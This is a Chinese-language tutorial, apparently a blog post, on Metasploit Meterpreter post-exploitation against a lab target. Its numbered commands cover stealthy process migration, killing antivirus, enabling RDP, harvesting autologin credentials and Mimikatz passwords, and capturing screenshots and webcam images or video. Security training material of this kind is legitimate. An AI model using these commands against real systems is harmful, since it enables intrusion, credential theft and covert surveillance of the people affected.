利用MSF进行后渗透攻击

本篇主要讲利用MSF获取靶机shell后可进行的操作及利用方式
前提:已经通过Samba服务漏洞获取了Meterpreter shell,利用方式可参考https://www.jianshu.com/p/839ac7af5e4c

后渗透攻击:信息搜集

进程迁移

刚获取的Meterpreter shell非常脆弱易受攻击,例如攻击者可以利用浏览器漏洞攻陷目标机器,攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动进程,将它和目标机中一个稳定的进程绑在一起,而不需要对磁盘进行任何写入操作。(渗透更难被检测)

  1. 使用 ps命令获取靶机正在运行的进程

    1.png

  2. 使用getpid命令查看Meterpreter Shell 的进程号

    2.png

  3. 使用migrate PID命令迁移进程,进程迁移后会自动关闭原来进程,没有关闭可使用 kill pid 命令关闭进程。或者使用自动迁移进程(run post/windows/manage/migrate)命令,系统会自动寻找合适的进程然后迁移

    3.png

系统命令

获得稳定进程后,收集系统信息

  1. 使用sysinfo 命令查看目标机的系统信息

    4.png

  2. 输入run post/windows/gather/checkvm 命令查看靶机是否允许在虚拟机上

    5.png

  3. 检查靶机是否正在运行,使用 idletime查看靶机最近运行的时间

    6.png

  4. 使用route命令查看靶机完整的网络设置

    7.png

  5. background 命令可将当前会话放置后台,适合在多个Meterpreter 会话的场景下使用。使用 getuid 命令查看当前靶机已经渗透成功的用户名


    8.png
  6. 使用run post/windows/manage/killav命令关闭靶机系统杀毒软件

    9.png

  7. 使用run post/windows/manage/enable_rdp命令启动靶机远程桌面协议

    10.png

  8. 使用background命令将当前Meterpreter终端隐藏在后台

  9. sessions -i 重新调用终端

    11.png

  10. 使用 run post/windows/gather/enum_logged_on_users列举当前登录靶机用户

    12.png

  11. 使用 run post/windows/gather/enum_applications 列举安装在靶机上的应用程序

    13.png

  12. 很多用户习惯将计算机设置自动登录,可以使用 run windows/gather/credentials/windows_autologin 抓取自动登录的用户名和密码

    14.png

  • Mimikatz 抓取密码
    使用load mimikatz命令加载模块,msv抓取
    15.png

    解密一下成功获取密码
    16.png
  1. 没有抓取到,此时可利用扩展插件Espia 抓取靶机屏幕截图。使用 load espia 命令加载插件,screengrab或者 screenshot 命令抓取截图
    16.png

一些其他可利用的命令

webcam_list
查看靶机是否有摄像头
webcam_snap
打开靶机摄像头拍一张照片
webcam_stream
开启直播模式,抓取视频

参考链接:
https://www.cnblogs.com/bmjoker/p/10151708.html

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容